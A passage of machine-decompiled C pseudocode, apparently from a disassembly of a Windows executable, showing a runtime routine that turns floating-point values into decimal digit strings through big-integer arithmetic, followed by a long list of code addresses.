												_v1400 = ( *(0xe41c7e + _t866 * 4) & 0x000000ff) + ( *(0xe41c7f + _t866 * 4) & 0x000000ff);
												E00DDFBE0(_t1167 << 2,  &_v1396, 0, _t1167 << 2);
												_t930 = E00DDF660( &(( &_v1396)[_t1167]), 0xe41378 + ( *(0xe41c7c + _v1900 * 4) & 0x0000ffff) * 4, ( *(0xe41c7f + _t866 * 4) & 0x000000ff) << 2);
												_t1276 = _v1400;
												_t1331 =  &(_t1331[6]);
												__eflags = _t1276 - _t1123;
												if(_t1276 > _t1123) {
													__eflags = _v472 - _t1123;
													if(_v472 > _t1123) {
														__eflags = _t1276 - _v472;
														_t1233 =  &_v1396;
														_t548 = _t1276 - _v472 > 0;
														__eflags = _t548;
														_t931 = _t930 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1233 =  &_v468;
														}
														_v1876 = _t1233;
														_t1168 =  &_v468;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1168 =  &_v1396;
														}
														_v1872 = _t1168;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1169 = _v472;
															_v1880 = _t1169;
														} else {
															_t1169 = _t1276;
															_v1880 = _t1276;
														}
														__eflags = _t931;
														if(_t931 != 0) {
															_t1276 = _v472;
														}
														_t932 = 0;
														_t1313 = 0;
														_v1864 = 0;
														__eflags = _t1169;
														if(_t1169 == 0) {
															L240:
															_v472 = _t932;
															_t1311 = 0x1cc;
															_t933 = _t932 << 2;
															__eflags = _t933;
															_push(_t933);
															_t934 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1233 + _t1313 * 4);
																if( *(_t1233 + _t1313 * 4) != 0) {
																	_t1236 = 0;
																	_t1170 = _t1313;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1276;
																	if(_t1276 == 0) {
																		L237:
																		__eflags = _t1170 - 0x73;
																		if(_t1170 == 0x73) {
																			goto L255;
																		} else {
																			_t1169 = _v1880;
																			_t1233 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1170 - 0x73;
																			if(_t1170 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1170 - _t932;
																			if(_t1170 == _t932) {
																				 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) & 0x00000000;
																				_t952 = _v1868 + 1 + _t1313;
																				__eflags = _t952;
																				_v1864 = _t952;
																			}
																			_t945 =  *(_v1872 + _v1868 * 4);
																			_t1238 = _v1876;
																			_t1236 = _t945 *  *(_t1238 + _t1313 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) + _t945 *  *(_t1238 + _t1313 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t949 = _v1868 + 1;
																			_t1170 = _t1170 + 1;
																			_v1868 = _t949;
																			__eflags = _t949 - _t1276;
																			_v1908 = _t1236;
																			_t932 = _v1864;
																			if(_t949 != _t1276) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1236;
																				if(_t1236 == 0) {
																					goto L237;
																				}
																				__eflags = _t1170 - 0x73;
																				if(_t1170 == 0x73) {
																					L255:
																					_t1311 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1170 - _t932;
																					if(_t1170 == _t932) {
																						_t604 = _t1326 + _t1170 * 4 - 0x740;
																						 *_t604 =  *(_t1326 + _t1170 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1170 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t943 = _t1236;
																					_t1236 = 0;
																					 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) + _t943;
																					_t932 = _v1864;
																					asm("adc edx, edx");
																					_t1170 = _t1170 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1313 - _t932;
																	if(_t1313 == _t932) {
																		 *(_t1326 + _t1313 * 4 - 0x740) =  *(_t1326 + _t1313 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1313 + 1; // 0x1
																		_t932 = _t567;
																		_v1864 = _t932;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1313 = _t1313 + 1;
																__eflags = _t1313 - _t1169;
															} while (_t1313 != _t1169);
															goto L240;
														}
													} else {
														_t1311 = 0x1cc;
														_v1872 = _v468;
														_v472 = _t1276;
														E00DE686E( &_v468, 0x1cc,  &_v1396, _t1276 << 2);
														_t960 = _v1872;
														_t1331 =  &(_t1331[4]);
														__eflags = _t960;
														if(_t960 != 0) {
															__eflags = _t960 - _t1123;
															if(_t960 == _t1123) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1172 = 0;
																	_t1277 = 0;
																	__eflags = 0;
																	do {
																		_t1234 = _t960 *  *(_t1326 + _t1277 * 4 - 0x1d0) >> 0x20;
																		 *(_t1326 + _t1277 * 4 - 0x1d0) = _t960 *  *(_t1326 + _t1277 * 4 - 0x1d0) + _t1172;
																		_t960 = _v1872;
																		asm("adc edx, 0x0");
																		_t1277 = _t1277 + 1;
																		_t1172 = _t1234;
																		__eflags = _t1277 - _v1884;
																	} while (_t1277 != _v1884);
																	__eflags = _t1172;
																	if(_t1172 == 0) {
																		goto L242;
																	} else {
																		_t963 = _v472;
																		__eflags = _t963 - 0x73;
																		if(_t963 >= 0x73) {
																			L256:
																			_v2408 = 0;
																			_v472 = 0;
																			E00DE686E( &_v468, _t1311,  &_v2404, 0);
																			_t1331 =  &(_t1331[4]);
																			_t937 = 0;
																		} else {
																			 *(_t1326 + _t963 * 4 - 0x1d0) = _t1172;
																			_v472 = _v472 + 1;
																			goto L242;
																		}
																	}
																}
															}
														} else {
															_v2408 = _t960;
															_v472 = _t960;
															_push(_t960);
															_t934 =  &_v2404;
															L241:
															_push(_t934);
															_push(_t1311);
															_push( &_v468);
															E00DE686E();
															_t1331 =  &(_t1331[4]);
															L242:
															_t937 = _t1123;
														}
													}
												} else {
													_t1278 = _v1396;
													__eflags = _t1278;
													if(_t1278 != 0) {
														__eflags = _t1278 - _t1123;
														if(_t1278 == _t1123) {
															goto L194;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L194;
															} else {
																_t1173 = 0;
																_v1884 = _v472;
																_t1314 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1278;
																	_t1235 = _t965 *  *(_t1326 + _t1314 * 4 - 0x1d0) >> 0x20;
																	 *(_t1326 + _t1314 * 4 - 0x1d0) = _t965 *  *(_t1326 + _t1314 * 4 - 0x1d0) + _t1173;
																	asm("adc edx, 0x0");
																	_t1314 = _t1314 + 1;
																	_t1173 = _t1235;
																	__eflags = _t1314 - _v1884;
																} while (_t1314 != _v1884);
																__eflags = _t1173;
																if(_t1173 == 0) {
																	goto L194;
																} else {
																	_t968 = _v472;
																	__eflags = _t968 - 0x73;
																	if(_t968 >= 0x73) {
																		_v2408 = 0;
																		_v472 = 0;
																		E00DE686E( &_v468, 0x1cc,  &_v2404, 0);
																		_t1331 =  &(_t1331[4]);
																		_t937 = 0;
																		goto L195;
																	} else {
																		 *(_t1326 + _t968 * 4 - 0x1d0) = _t1173;
																		_v472 = _v472 + 1;
																		goto L194;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v2408 = 0;
														_v472 = 0;
														E00DE686E( &_v468, 0x1cc,  &_v2404, 0);
														_t1331 =  &(_t1331[4]);
														L194:
														_t937 = _t1123;
													}
													L195:
													_t1311 = 0x1cc;
												}
												L243:
												__eflags = _t937;
												if(_t937 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L259:
													_push( &_v2404);
													_t915 =  &_v468;
													goto L260;
												} else {
													goto L244;
												}
												goto L261;
												L244:
												_t866 = _v1892 - _v1900;
												__eflags = _t866;
												_v1892 = _t866;
											} while (_t866 != 0);
											_t1156 = _v1920;
											goto L246;
										}
									} else {
										_t977 = _t864 / _t1155;
										_v1872 = _t977;
										_t1174 = _t864 % _t1155;
										_v1920 = _t1174;
										__eflags = _t977;
										if(_t977 == 0) {
											L174:
											__eflags = _t1174;
											if(_t1174 != 0) {
												_t978 =  *(0xe41d14 + _t1174 * 4);
												_v1884 = _t978;
												__eflags = _t978;
												if(_t978 != 0) {
													__eflags = _t978 - _t1123;
													if(_t978 != _t1123) {
														_t1175 = _v936;
														__eflags = _t1175;
														if(_t1175 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1279 = 0;
															__eflags = 0;
															do {
																_t1240 = _t978 *  *(_t1326 + _t1279 * 4 - 0x3a0) >> 0x20;
																 *(_t1326 + _t1279 * 4 - 0x3a0) = _t978 *  *(_t1326 + _t1279 * 4 - 0x3a0) + _v1872;
																_t978 = _v1884;
																asm("adc edx, 0x0");
																_t1279 = _t1279 + 1;
																_v1872 = _t1240;
																__eflags = _t1279 - _t1175;
															} while (_t1279 != _t1175);
															__eflags = _t1240;
															if(_t1240 != 0) {
																_t981 = _v936;
																__eflags = _t981 - 0x73;
																if(_t981 >= 0x73) {
																	goto L176;
																} else {
																	 *(_t1326 + _t981 * 4 - 0x3a0) = _t1240;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L176:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L180;
												}
											}
										} else {
											do {
												__eflags = _t977 - 0x26;
												if(_t977 > 0x26) {
													_t977 = 0x26;
												}
												_t1176 =  *(0xe41c7e + _t977 * 4) & 0x000000ff;
												_v1876 = _t977;
												_v1400 = ( *(0xe41c7e + _t977 * 4) & 0x000000ff) + ( *(0xe41c7f + _t977 * 4) & 0x000000ff);
												E00DDFBE0(_t1176 << 2,  &_v1396, 0, _t1176 << 2);
												_t994 = E00DDF660( &(( &_v1396)[_t1176]), 0xe41378 + ( *(0xe41c7c + _v1876 * 4) & 0x0000ffff) * 4, ( *(0xe41c7f + _t977 * 4) & 0x000000ff) << 2);
												_t1282 = _v1400;
												_t1331 =  &(_t1331[6]);
												__eflags = _t1282 - _t1123;
												if(_t1282 > _t1123) {
													__eflags = _v936 - _t1123;
													if(_v936 > _t1123) {
														__eflags = _t1282 - _v936;
														_t1241 =  &_v1396;
														_t338 = _t1282 - _v936 > 0;
														__eflags = _t338;
														_t995 = _t994 & 0xffffff00 | _t338;
														if(_t338 >= 0) {
															_t1241 =  &_v932;
														}
														_v1900 = _t1241;
														_t1177 =  &_v932;
														__eflags = _t995;
														if(_t995 == 0) {
															_t1177 =  &_v1396;
														}
														_v1880 = _t1177;
														__eflags = _t995;
														if(_t995 == 0) {
															_t1178 = _v936;
															_v1908 = _t1178;
														} else {
															_t1178 = _t1282;
															_v1908 = _t1282;
														}
														__eflags = _t995;
														if(_t995 != 0) {
															_t1282 = _v936;
														}
														_t996 = 0;
														_t1316 = 0;
														_v1864 = 0;
														__eflags = _t1178;
														if(_t1178 == 0) {
															L168:
															_v936 = _t996;
															_t1311 = 0x1cc;
															_t997 = _t996 << 2;
															__eflags = _t997;
															_push(_t997);
															_t998 =  &_v1860;
															goto L169;
														} else {
															do {
																__eflags =  *(_t1241 + _t1316 * 4);
																if( *(_t1241 + _t1316 * 4) != 0) {
																	_t1244 = 0;
																	_t1179 = _t1316;
																	_v1868 = _v1868 & 0;
																	_v1892 = 0;
																	__eflags = _t1282;
																	if(_t1282 == 0) {
																		L165:
																		__eflags = _t1179 - 0x73;
																		if(_t1179 == 0x73) {
																			goto L177;
																		} else {
																			_t1178 = _v1908;
																			_t1241 = _v1900;
																			goto L167;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1179 - 0x73;
																			if(_t1179 == 0x73) {
																				goto L160;
																			}
																			__eflags = _t1179 - _t996;
																			if(_t1179 == _t996) {
																				 *(_t1326 + _t1179 * 4 - 0x740) =  *(_t1326 + _t1179 * 4 - 0x740) & 0x00000000;
																				_t1016 = _v1868 + 1 + _t1316;
																				__eflags = _t1016;
																				_v1864 = _t1016;
																			}
																			_t1009 =  *(_v1880 + _v1868 * 4);
																			_t1246 = _v1900;
																			_t1244 = _t1009 *  *(_t1246 + _t1316 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1326 + _t1179 * 4 - 0x740) =  *(_t1326 + _t1179 * 4 - 0x740) + _t1009 *  *(_t1246 + _t1316 * 4) + _v1892;
																			asm("adc edx, 0x0");
																			_t1013 = _v1868 + 1;
																			_t1179 = _t1179 + 1;
																			_v1868 = _t1013;
																			__eflags = _t1013 - _t1282;
																			_v1892 = _t1244;
																			_t996 = _v1864;
																			if(_t1013 != _t1282) {
																				continue;
																			} else {
																				goto L160;
																			}
																			while(1) {
																				L160:
																				__eflags = _t1244;
																				if(_t1244 == 0) {
																					goto L165;
																				}
																				__eflags = _t1179 - 0x73;
																				if(_t1179 == 0x73) {
																					L177:
																					__eflags = 0;
																					_t1311 = 0x1cc;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t1004 =  &_v2404;
																					goto L178;
																				} else {
																					__eflags = _t1179 - _t996;
																					if(_t1179 == _t996) {
																						_t394 = _t1326 + _t1179 * 4 - 0x740;
																						 *_t394 =  *(_t1326 + _t1179 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t394;
																						_t400 = _t1179 + 1; // 0x1
																						_v1864 = _t400;
																					}
																					_t1007 = _t1244;
																					_t1244 = 0;
																					 *(_t1326 + _t1179 * 4 - 0x740) =  *(_t1326 + _t1179 * 4 - 0x740) + _t1007;
																					_t996 = _v1864;
																					asm("adc edx, edx");
																					_t1179 = _t1179 + 1;
																					continue;
																				}
																				goto L171;
																			}
																			goto L165;
																		}
																		goto L160;
																	}
																} else {
																	__eflags = _t1316 - _t996;
																	if(_t1316 == _t996) {
																		 *(_t1326 + _t1316 * 4 - 0x740) =  *(_t1326 + _t1316 * 4 - 0x740) & 0x00000000;
																		_t357 = _t1316 + 1; // 0x1
																		_t996 = _t357;
																		_v1864 = _t996;
																	}
																	goto L167;
																}
																goto L171;
																L167:
																_t1316 = _t1316 + 1;
																__eflags = _t1316 - _t1178;
															} while (_t1316 != _t1178);
															goto L168;
														}
													} else {
														_t1311 = 0x1cc;
														_v1880 = _v932;
														_v936 = _t1282;
														E00DE686E( &_v932, 0x1cc,  &_v1396, _t1282 << 2);
														_t1024 = _v1880;
														_t1331 =  &(_t1331[4]);
														__eflags = _t1024;
														if(_t1024 != 0) {
															__eflags = _t1024 - _t1123;
															if(_t1024 == _t1123) {
																goto L170;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L170;
																} else {
																	_v1884 = _v936;
																	_t1181 = 0;
																	_t1283 = 0;
																	__eflags = 0;
																	do {
																		_t1242 = _t1024 *  *(_t1326 + _t1283 * 4 - 0x3a0) >> 0x20;
																		 *(_t1326 + _t1283 * 4 - 0x3a0) = _t1024 *  *(_t1326 + _t1283 * 4 - 0x3a0) + _t1181;
																		_t1024 = _v1880;
																		asm("adc edx, 0x0");
																		_t1283 = _t1283 + 1;
																		_t1181 = _t1242;
																		__eflags = _t1283 - _v1884;
																	} while (_t1283 != _v1884);
																	__eflags = _t1181;
																	if(_t1181 == 0) {
																		goto L170;
																	} else {
																		_t1027 = _v936;
																		__eflags = _t1027 - 0x73;
																		if(_t1027 >= 0x73) {
																			_v1400 = 0;
																			_v936 = 0;
																			_push(0);
																			_t1004 =  &_v1396;
																			L178:
																			_push(_t1004);
																			_push(_t1311);
																			_push( &_v932);
																			E00DE686E();
																			_t1331 =  &(_t1331[4]);
																			_t1001 = 0;
																		} else {
																			 *(_t1326 + _t1027 * 4 - 0x3a0) = _t1181;
																			_v936 = _v936 + 1;
																			goto L170;
																		}
																	}
																}
															}
														} else {
															_v1400 = _t1024;
															_v936 = _t1024;
															_push(_t1024);
															_t998 =  &_v1396;
															L169:
															_push(_t998);
															_push(_t1311);
															_push( &_v932);
															E00DE686E();
															_t1331 =  &(_t1331[4]);
															L170:
															_t1001 = _t1123;
														}
													}
												} else {
													_t1284 = _v1396;
													__eflags = _t1284;
													if(_t1284 != 0) {
														__eflags = _t1284 - _t1123;
														if(_t1284 == _t1123) {
															goto L121;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L121;
															} else {
																_t1182 = 0;
																_v1884 = _v936;
																_t1317 = 0;
																__eflags = 0;
																do {
																	_t1030 = _t1284;
																	_t1243 = _t1030 *  *(_t1326 + _t1317 * 4 - 0x3a0) >> 0x20;
																	 *(_t1326 + _t1317 * 4 - 0x3a0) = _t1030 *  *(_t1326 + _t1317 * 4 - 0x3a0) + _t1182;
																	asm("adc edx, 0x0");
																	_t1317 = _t1317 + 1;
																	_t1182 = _t1243;
																	__eflags = _t1317 - _v1884;
																} while (_t1317 != _v1884);
																__eflags = _t1182;
																if(_t1182 == 0) {
																	goto L121;
																} else {
																	_t1033 = _v936;
																	__eflags = _t1033 - 0x73;
																	if(_t1033 >= 0x73) {
																		_v1400 = 0;
																		_v936 = 0;
																		E00DE686E( &_v932, 0x1cc,  &_v1396, 0);
																		_t1331 =  &(_t1331[4]);
																		_t1001 = 0;
																		goto L122;
																	} else {
																		 *(_t1326 + _t1033 * 4 - 0x3a0) = _t1182;
																		_v936 = _v936 + 1;
																		goto L121;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v1864 = 0;
														_v936 = 0;
														E00DE686E( &_v932, 0x1cc,  &_v1860, 0);
														_t1331 =  &(_t1331[4]);
														L121:
														_t1001 = _t1123;
													}
													L122:
													_t1311 = 0x1cc;
												}
												L171:
												__eflags = _t1001;
												if(_t1001 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t429 =  &_v936;
													 *_t429 = _v936 & 0x00000000;
													__eflags =  *_t429;
													_push(0);
													L180:
													_push( &_v2404);
													_t915 =  &_v932;
													L260:
													_push(_t1311);
													_push(_t915);
													E00DE686E();
													_t1331 =  &(_t1331[4]);
												} else {
													goto L172;
												}
												goto L261;
												L172:
												_t977 = _v1872 - _v1876;
												__eflags = _t977;
												_v1872 = _t977;
											} while (_t977 != 0);
											_t1174 = _v1920;
											goto L174;
										}
									}
									L261:
									_t1157 = _v472;
									_t1268 = _v1896;
									_v1868 = _t1268;
									__eflags = _t1157;
									if(_t1157 != 0) {
										_v1872 = _v1872 & 0x00000000;
										_t1272 = 0;
										__eflags = 0;
										do {
											_t904 =  *(_t1326 + _t1272 * 4 - 0x1d0);
											_t1230 = 0xa;
											_t1231 = _t904 * _t1230 >> 0x20;
											 *(_t1326 + _t1272 * 4 - 0x1d0) = _t904 * _t1230 + _v1872;
											asm("adc edx, 0x0");
											_t1272 = _t1272 + 1;
											_v1872 = _t1231;
											__eflags = _t1272 - _t1157;
										} while (_t1272 != _t1157);
										_t1268 = _v1868;
										__eflags = _t1231;
										if(_t1231 != 0) {
											_t907 = _v472;
											__eflags = _t907 - 0x73;
											if(_t907 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00DE686E( &_v468, _t1311,  &_v2404, 0);
												_t1331 =  &(_t1331[4]);
											} else {
												 *(_t1326 + _t907 * 4 - 0x1d0) = _t1231;
												_v472 = _v472 + 1;
											}
										}
									}
									_t869 = E00DEAA00( &_v472,  &_v936);
									_t1139 = _v1896;
									_t1222 = 0xa;
									__eflags = _t869 - _t1222;
									if(_t869 != _t1222) {
										__eflags = _t869;
										if(_t869 != 0) {
											_t1268 = _t1139 + 1;
											 *_t1139 = _t869 + 0x30;
											_v1868 = _t1268;
											goto L276;
										} else {
											_t871 = _v1904 - 1;
											goto L277;
										}
										goto L308;
									} else {
										_t895 = _v936;
										_t1268 = _t1139 + 1;
										_v1904 = _v1904 + 1;
										 *_t1139 = 0x31;
										_v1868 = _t1268;
										_v1884 = _t895;
										__eflags = _t895;
										if(_t895 != 0) {
											_t1271 = 0;
											_t1164 = 0;
											__eflags = 0;
											do {
												_t896 =  *(_t1326 + _t1164 * 4 - 0x3a0);
												 *(_t1326 + _t1164 * 4 - 0x3a0) = _t896 * _t1222 + _t1271;
												asm("adc edx, 0x0");
												_t1164 = _t1164 + 1;
												_t1271 = _t896 * _t1222 >> 0x20;
												_t1222 = 0xa;
												__eflags = _t1164 - _v1884;
											} while (_t1164 != _v1884);
											_v1884 = _t1271;
											__eflags = _t1271;
											_t1268 = _v1868;
											if(_t1271 != 0) {
												_t1165 = _v936;
												__eflags = _t1165 - 0x73;
												if(_t1165 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00DE686E( &_v932, _t1311,  &_v2404, 0);
													_t1331 =  &(_t1331[4]);
												} else {
													 *((intOrPtr*)(_t1326 + _t1165 * 4 - 0x3a0)) = _v1884;
													_t723 =  &_v936;
													 *_t723 = _v936 + 1;
													__eflags =  *_t723;
												}
											}
											_t1139 = _v1896;
										}
										L276:
										_t871 = _v1904;
									}
									L277:
									 *((intOrPtr*)(_v1928 + 4)) = _t871;
									_t1216 = _v1916;
									__eflags = _t871;
									if(_t871 >= 0) {
										__eflags = _t1216 - 0x7fffffff;
										if(_t1216 <= 0x7fffffff) {
											_t1216 = _t1216 + _t871;
											__eflags = _t1216;
										}
									}
									_t873 = _a24 - 1;
									__eflags = _t873 - _t1216;
									if(_t873 >= _t1216) {
										_t873 = _t1216;
									}
									_t874 = _t873 + _t1139;
									_v1872 = _t874;
									__eflags = _t1268 - _t874;
									if(_t1268 != _t874) {
										while(1) {
											_t877 = _v472;
											__eflags = _t877;
											if(_t877 == 0) {
												goto L302;
											}
											_t1129 = 0;
											_t1269 = _t877;
											_t1160 = 0;
											__eflags = 0;
											do {
												_t878 =  *(_t1326 + _t1160 * 4 - 0x1d0);
												 *(_t1326 + _t1160 * 4 - 0x1d0) = _t878 * 0x3b9aca00 + _t1129;
												asm("adc edx, 0x0");
												_t1160 = _t1160 + 1;
												_t1129 = _t878 * 0x3b9aca00 >> 0x20;
												__eflags = _t1160 - _t1269;
											} while (_t1160 != _t1269);
											_t1270 = _v1868;
											__eflags = _t1129;
											if(_t1129 != 0) {
												_t889 = _v472;
												__eflags = _t889 - 0x73;
												if(_t889 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00DE686E( &_v468, _t1311,  &_v2404, 0);
													_t1331 =  &(_t1331[4]);
												} else {
													 *(_t1326 + _t889 * 4 - 0x1d0) = _t1129;
													_v472 = _v472 + 1;
												}
											}
											_t883 = E00DEAA00( &_v472,  &_v936);
											__eflags = _v472;
											_t1123 = _t1129 & 0xffffff00 | _v472 == 0x00000000;
											_v1916 = 8;
											_t1139 = _v1872 - _t1270;
											__eflags = _t1139;
											do {
												_t1227 = _t883 % _v1912;
												_v1920 = _t883 / _v1912;
												_v1884 = _t1227;
												_t886 = _t1227 + 0x30;
												_t1228 = _v1916;
												__eflags = _t1139 - _t1228;
												if(_t1139 >= _t1228) {
													 *(_t1228 + _t1270) = _t886;
												} else {
													__eflags = _t886 - 0x30;
													_t1123 = _t1123 & (_t886 & 0xffffff00 | _t886 != 0x00000030) - 0x00000001;
												}
												_t883 = _v1920;
												_t1216 = _t1228 - 1;
												_v1916 = _t1216;
												__eflags = _t1216 - 0xffffffff;
											} while (_t1216 != 0xffffffff);
											__eflags = _t1139 - 9;
											if(_t1139 > 9) {
												_t1139 = 9;
											}
											_t1268 = _t1270 + _t1139;
											_v1868 = _t1268;
											__eflags = _t1268 - _v1872;
											if(_t1268 != _v1872) {
												continue;
											}
											goto L302;
										}
									}
									L302:
									 *_t1268 = 0;
									__eflags = _t1123;
									_t876 = 0 | __eflags != 0x00000000;
									_v1884 = _t876;
									_t1123 = _t876;
									goto L308;
								}
							}
						}
					}
				} else {
					_t1139 = _t1302 & 0x000fffff;
					if((_a4 | _t1302 & 0x000fffff) == 0 || (_v1944 & 0x01000000) != 0) {
						_push(0xe2a1d8);
						 *((intOrPtr*)(_v1928 + 4)) =  *(_v1928 + 4) & 0x00000000;
						L12:
						_push(_a24);
						_push(_v1896);
						if(E00DEC84C() != 0) {
							L311:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00DE2347();
							asm("int3");
							_push(_t1326);
							_t1140 = _v2436;
							__eflags = _t1140 - 0xfffffffe;
							if(__eflags != 0) {
								__eflags = _t1140;
								if(__eflags < 0) {
									L317:
									 *((intOrPtr*)(E00DE58BA(__eflags))) = 9;
									E00DE231A();
									goto L318;
								} else {
									__eflags = _t1140 -  *0xe89660; // 0x40
									if(__eflags >= 0) {
										goto L317;
									} else {
										_t826 =  *( *((intOrPtr*)(0xe89460 + (_t1140 >> 6) * 4)) + 0x28 + (_t1140 & 0x0000003f) * 0x38) & 0x40;
										__eflags = _t826;
										return _t826;
									}
								}
							} else {
								 *((intOrPtr*)(E00DE58BA(__eflags))) = 9;
								L318:
								__eflags = 0;
								return 0;
							}
						} else {
							L308:
							_t1341 = _v1932;
							_pop(_t1261);
							_pop(_t1303);
							if(_v1932 != 0) {
								E00E066C6(_t1139, _t1341,  &_v1940);
							}
							_pop(_t1124);
							return E00DDCBCE(_t1123, _t1124, _v8 ^ _t1326, _t1216, _t1261, _t1303);
						}
					} else {
						goto L14;
					}
				}
			}

0x00e0303e
0x00e0303e
0x00e0303e
0x00e03049
0x00e03050
0x00e03056
0x00e0305f
0x00e0306b
0x00e0306d
0x00e0307d
0x00e03081
0x00e03093
0x00e03099
0x00e03083
0x00e03083
0x00e03083
0x00e0309f
0x00e030a0
0x00e030a3
0x00e030a6
0x00e030a7
0x00e030a9
0x00e030b8
0x00e030b3
0x00e030b5
0x00e030b5
0x00e030ba
0x00e030c4
0x00e030cc
0x00e030d6
0x00e030e5
0x00e030ea
0x00e03134
0x00e03138
0x00e0313d
0x00e0313e
0x00e03140
0x00e03142
0x00e03148
0x00e03148
0x00e0314b
0x00e0314b
0x00e0314e
0x00e04503
0x00e0450b
0x00e0450d
0x00000000
0x00e0450f
0x00e0450f
0x00e0450f
0x00000000
0x00e0450f
0x00e03154
0x00e03154
0x00e03154
0x00e03157
0x00e044eb
0x00000000
0x00e0315d
0x00e0315d
0x00e0315d
0x00e03160
0x00e044e1
0x00000000
0x00e03166
0x00e03166
0x00e03169
0x00e044d7
0x00000000
0x00e0316f
0x00e03178
0x00e03185
0x00e03189
0x00e0318c
0x00e03192
0x00e0319a
0x00e031a0
0x00e031aa
0x00e031aa
0x00e031ad
0x00e031b9
0x00e031bb
0x00e031c0
0x00e031c0
0x00e031c0
0x00e031af
0x00e031af
0x00e031b1
0x00e031b1
0x00e031cc
0x00e031da
0x00e031e0
0x00e031e2
0x00e031ea
0x00e031f0
0x00e031f5
0x00e031f6
0x00e031f7
0x00e031fa
0x00e03201
0x00e03206
0x00e0320e
0x00e0320f
0x00e03214
0x00e0321d
0x00e0321d
0x00e0321f
0x00e03216
0x00e03216
0x00e0321b
0x00000000
0x00000000
0x00e0321b
0x00e03225
0x00e03233
0x00e03235
0x00e0323e
0x00e03244
0x00e03245
0x00e0324b
0x00e03251
0x00e03257
0x00e035f6
0x00e035f9
0x00e03713
0x00e03715
0x00e0371a
0x00e0371a
0x00e0371a
0x00e03728
0x00e0372f
0x00e03732
0x00e03737
0x00e03737
0x00e03734
0x00e03734
0x00e03734
0x00e0373b
0x00e0373d
0x00e03741
0x00e03743
0x00e03746
0x00e03775
0x00e03778
0x00e0377b
0x00e0377d
0x00e03780
0x00e03780
0x00e03782
0x00e0378d
0x00e0378d
0x00e03784
0x00e03784
0x00e03784
0x00e0378f
0x00e03791
0x00e0379c
0x00e0379c
0x00e03793
0x00e03793
0x00e03793
0x00e037a5
0x00e037ac
0x00e037ad
0x00e037ae
0x00e037b1
0x00000000
0x00000000
0x00e037b3
0x00e037b3
0x00e03780
0x00e037bb
0x00e037bb
0x00e03748
0x00e03748
0x00e03755
0x00e0376b
0x00e03770
0x00e03770
0x00e037d4
0x00e037e0
0x00e037ed
0x00e037ef
0x00e035ff
0x00e035ff
0x00e03606
0x00e03610
0x00e0361a
0x00e0361c
0x00e03622
0x00e03622
0x00e03624
0x00e03624
0x00e0362b
0x00e03632
0x00000000
0x00000000
0x00e03638
0x00e0363b
0x00e0363e
0x00000000
0x00e03640
0x00e03640
0x00e03642
0x00e03645
0x00e0364b
0x00e03650
0x00e0364d
0x00e0364d
0x00e0364d
0x00e03654
0x00e03657
0x00e0365b
0x00e0365d
0x00e03660
0x00e0368c
0x00e0368f
0x00e03692
0x00e03694
0x00e03697
0x00e03697
0x00e03699
0x00e036a4
0x00e0369b
0x00e0369b
0x00e0369b
0x00e036a6
0x00e036a8
0x00e036b3
0x00e036aa
0x00e036aa
0x00e036aa
0x00e036bd
0x00e036c4
0x00e036c5
0x00e036c6
0x00e036c9
0x00000000
0x00000000
0x00e036cb
0x00e036cb
0x00e03697
0x00e036d3
0x00e036d3
0x00e03662
0x00e03669
0x00e03676
0x00e03682
0x00e03687
0x00e03687
0x00e036ec
0x00e036f8
0x00e03707
0x00e03707
0x00000000
0x00e0363e
0x00e03624
0x00000000
0x00e0361c
0x00e037f6
0x00e037f6
0x00e037f9
0x00e037fe
0x00e03804
0x00e0381d
0x00e03824
0x00e03827
0x00e03827
0x00e0325d
0x00e0325d
0x00e03264
0x00e0326e
0x00e03278
0x00e0327a
0x00e0345e
0x00e0345e
0x00e0346a
0x00e03472
0x00e03478
0x00e03482
0x00e03488
0x00e0348d
0x00e03493
0x00e03494
0x00e03494
0x00e03494
0x00e0349b
0x00e034a1
0x00e034a3
0x00e034b0
0x00e034b3
0x00e034be
0x00e034be
0x00e034be
0x00e034b5
0x00e034b6
0x00e034b6
